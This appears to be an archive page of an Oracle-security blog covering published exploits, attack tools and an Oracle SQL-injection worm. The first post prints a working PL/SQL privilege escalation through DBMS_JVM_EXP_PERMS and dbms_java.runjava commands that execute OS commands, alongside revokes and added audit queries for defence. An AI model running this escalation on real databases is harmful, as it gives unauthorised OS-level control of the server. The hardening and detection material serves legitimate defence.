Archive of the category Exploit

Oracle 11g 0day exploit published

I just read on Sumit Siddharth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

DECLARE
  -- collection type expected by DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  -- one policy row: GRANT <current user> java.io.FilePermission <<ALL FILES>> execute
  CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  -- import the row into the Java policy table
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;

For security reasons you should:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on "oracle/aurora/util/Wrapper" from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3');
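Two audit queries that verify the hardening above and detect the policy row the exploit inserts. This is an added example, not code from the original post or from Oracle; it assumes DBA access and uses only the standard dictionary views DBA_TAB_PRIVS and DBA_JAVA_POLICY. On a hardened database both queries should return no rows from untrusted grantees.

```sql
-- Added example (not from the original post). Run as a DBA.

-- 1. Packages and the Java class that PUBLIC should no longer be able to execute.
--    Any row returned means one of the REVOKE statements above is still missing.
SELECT table_name, privilege, grantable
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND owner   = 'SYS'
   AND table_name IN ('DBMS_JAVA',
                      'DBMS_JAVA_TEST',
                      'DBMS_JVM_EXP_PERMS',
                      'oracle/aurora/util/Wrapper')
 ORDER BY table_name;

-- 2. Java policy entries that grant file access on <<ALL FILES>> to anyone but SYS.
--    The PL/SQL block above adds exactly such a GRANT row for the current user,
--    so an unexpected database user here is a strong indicator of the attack.
--    Rows for built-in roles (e.g. JAVASYSPRIV) are expected and must be reviewed
--    against what the application really needs.
SELECT seq, kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE kind      = 'GRANT'
   AND type_name = 'java.io.FilePermission'
   AND name      = '<<ALL FILES>>'
   AND grantee  <> 'SYS'
 ORDER BY seq;

-- To remove a rogue entry found by query 2, delete it by its SEQ value
-- (replace <SEQ> with the number from the query result):
-- EXEC DBMS_JAVA.DELETE_PERMISSION(<SEQ>);
```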

Metasploit 3.3 is out

Metasploit 3.3, the leading exploit framework, is out. Here is an extract from the Metasploit blog:

Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws.

Version 3.3 (release notes) is the largest known Ruby application (375,000 lines of code) and comes with some new Oracle features:

  • Support for the Oracle InstantClient Ruby driver as an exploit mixin
  • Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

New Russian Oracle exploit tool “Oracle Security Tools” (updated)

During my research on Russian websites I found a new security tool called “Oracle Security Tools”. This tool offers different methods to exploit Oracle databases.

[Screenshot: Oracle Security Tools]

Here is a list of features:

  • Privilege escalation of Oracle users;
  • Verification of system accounts for the existence of a default password;
  • Account compliance test for login=password;
  • Execution of PL/SQL code;
  • Privilege escalation in the OS (Windows 2000/XP/2003): adds a local user with administrative rights and remote connection privileges;
  • Infiltration into the OS and execution of DOS commands with administrative rights;
  • Viewing the users’ connections to the database and their activity;
  • Analysis of an external TNS listener.log;

After checking the executable on VirusTotal I ran the program on one of my test VMwares. After switching the Russian interface to the English interface I was not able to run the tool. I always got the error message:

It seems to be a problem with my VMware system and the multiple Oracle Homes. After switching to another computer the program was working without problems.

Paul Wright Released Whitepaper About “Create Table to OSDBA” (Preprocessor Exploit)

Paul Wright wrote an interesting whitepaper, “Create table to OSDBA”, about the new preprocessor feature in 11.1.0.7 and higher that allows running OS commands via tables. This whitepaper shows how to escalate privileges by running operating system commands using CREATE TABLE together with utl_file. In the future Oracle plans to backport the functionality to Oracle 10.2.0.5.

I already talked about the danger of running OS commands via “Create Table” in February 2009 in “Trends 2009” (German slides, slide 20) and released in April 2009 a tutorial on how to run OS commands via Create Table, dbms_scheduler, extproc, PL/SQL native 9, PL/SQL native 10/11, Oracle Text and ALTER SYSTEM. Paul added the idea of executing files created with utl_file.

Oracle changed the preprocessor handling in Oracle 11.2.0.1. In 11.2.0.1 it is necessary to have the EXECUTE privilege on a directory object (“Execute a preprocessor program that resides in the directory. A preprocessor program converts data to a supported format when loading data records from an external table with the ORACLE_LOADER access driver. Refer to Oracle Database Utilities for more information. This privilege does not implicitly allow READ access on the external table data.”).

Paul wrote a recommendation on how to mitigate the preprocessor risk. He recommends revoking utl_file from PUBLIC. This is a good idea, but keep in mind that there are multiple ways to create (text) files on OS level (e.g. the sample exploit using dbms_advisor).

I would also recommend granting READ and WRITE instead of ALL on directory objects (ALL includes EXECUTE in 11.2.0.1). Granting to PUBLIC is also always a bad idea: grant privileges only to a role and/or user.
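An audit of directory object grants following the two recommendations above, plus the weak grant beside its corrected form. This is an added example, not code from the whitepaper or the original post; it assumes DBA access, the standard views DBA_TAB_PRIVS and DBA_DIRECTORIES, and the placeholder names DATA_DIR (directory) and APP_LOADER (role).

```sql
-- Added example (not from the original post). Run as a DBA on 11.2.0.1.
-- Directory objects are owned by SYS, so they appear in DBA_TAB_PRIVS with
-- owner = 'SYS' and the directory name in table_name.

-- 1. Who may run a preprocessor program, and from which OS path?
SELECT p.grantee, p.table_name AS directory_name, d.directory_path, p.privilege
  FROM dba_tab_privs  p
  JOIN dba_directories d ON d.directory_name = p.table_name
 WHERE p.owner     = 'SYS'
   AND p.privilege = 'EXECUTE'
 ORDER BY p.grantee, p.table_name;

-- 2. Directory privileges held by PUBLIC (every session has them; none are acceptable).
SELECT p.table_name AS directory_name, p.privilege
  FROM dba_tab_privs  p
  JOIN dba_directories d ON d.directory_name = p.table_name
 WHERE p.grantee = 'PUBLIC'
 ORDER BY p.table_name, p.privilege;

-- 3. Is UTL_FILE (the file-writing primitive the whitepaper relies on) still PUBLIC?
SELECT table_name, privilege
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC' AND owner = 'SYS' AND table_name = 'UTL_FILE';

-- Weak setting: ALL implies EXECUTE in 11.2.0.1, and PUBLIC reaches every user.
-- GRANT ALL ON DIRECTORY data_dir TO PUBLIC;

-- Corrected: only the privileges the loader needs, granted to a role (placeholder
-- role APP_LOADER), and nothing to PUBLIC.
REVOKE ALL ON DIRECTORY data_dir FROM PUBLIC;
GRANT READ, WRITE ON DIRECTORY data_dir TO app_loader;
```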

Defcon Presentation about an Oracle Worm, oap_hacker and bsqlbf

Sumit Siddharth has published his Defcon presentation about “The Making of Second SQL Injection Worm (Oracle Edition)”.

Sumit describes the differences between SQL Injection and PL/SQL Injection and presents his tool “oap_hacker.pl”, which allows running OS commands via Java. oap_hacker.pl and Bsqlbf v.2.3 use a PL/SQL Injection bug in dbms_export_extension (the old one, not the new one which was fixed with the CPU July 2009).

BTW, the (underground) tool darkORASQLi.py for dumping data from Oracle databases also uses the dbms_export_extension vulnerability to run OS commands.

A demo of his Oracle worm ora_w0rm.pl is available on YouTube.

Here are some screenshots showing how a client PC that accesses an Oracle system infected via the worm can be taken over:

[Screenshots: Oracle Worm 1, Oracle Worm 2, Oracle Worm 3, Oracle Worm 4]

Very interesting work. Thanks Sumit for this presentation.